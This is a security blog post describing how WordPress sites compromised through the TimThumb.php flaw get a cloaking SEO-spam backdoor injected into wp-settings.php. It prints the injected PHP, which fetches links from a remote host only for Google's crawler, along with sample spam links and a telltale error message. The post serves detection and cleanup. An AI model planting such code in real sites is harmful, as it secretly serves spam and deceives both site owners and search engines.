The Latest in IT Security

TimThumb.php Attacks – Now Being Used for Blackhat Spam SEO and Might Break Your Site


We have been talking a lot lately about the Timthumb.php vulnerability and the importance of updating that script as soon as possible. Sites that didn’t update it are getting compromised very easily. We explained it in more detail here: Mass infection of WordPress sites because of TimThumb.php.

What we are seeing now is sites getting compromised to load links for blackhat seo purposes. They have their wp-settings.php modified with the following code:

function google_bot() {$sUserAgent = strtolower($_SERVER[‘HTTP_USER_AGENT’]);if(!(strpos($sUserAgent, ‘google’) === false)) {if(isset($_SERVER[‘REMOTE_ADDR’]) == true && isset($_SERVER[‘HTTP_HOST’]) == true){$ch = curl_init("’.$_SERVER[‘REMOTE_ADDR"].’&host=’.$_SERVER[‘HTTP_HOST’].
[‘HTTP_REFERER’]);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_TIMEOUT, 10);$re = curl_exec($ch);curl_close($ch);echo $re;}}}add_action(‘wp_footer’, "google_bot");

What this code does is very simple. It connects to to get a few links to be added to the bottom of your site. Links like:

 <a href=" /wp-content/uploads/sweaters/sweater_tights&#46html" alt="Sweater 
Tights" title="Sweater Tights">Sweater Tights</a>
 dilbert sweater vest comic
<br>knitting softwares
 the knitting room fond du lac
 <a href=" /wp-content/uploads/knitting/knitting_instructions&#46html" alt="Knitting 
Instructions" title="Knitting Instructions">Knitting Instructions</a>
 knitting little luxuries louisa harding

It’s very dynamic, always changing. So in addition to having malware and infecting your users, you could be helping the attackers with page rank as well.

What is interesting is that on some sites the attackers are not only attempting to infect, but are doing it incorrectly leaving some extra lines at the bottom of the wp-settings.php, causing the sites to fail with this error:

Warning: Cannot modify header information – headers already sent by (output started at /home/site/public_html/wp-settings.php:310) in /home1/site/public_html/wp-includes/pluggable.php on line 890

So if you have this warning (headers already sent by (output started at /home/site/public_html/wp-settings.php:310) on your site, it means you are likely compromised as well.

You can check your site here to see if it has this issue: Sucuri SiteCheck

If you need help cleaning up up, sign up here:

Leave a reply



Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...



Latest Comments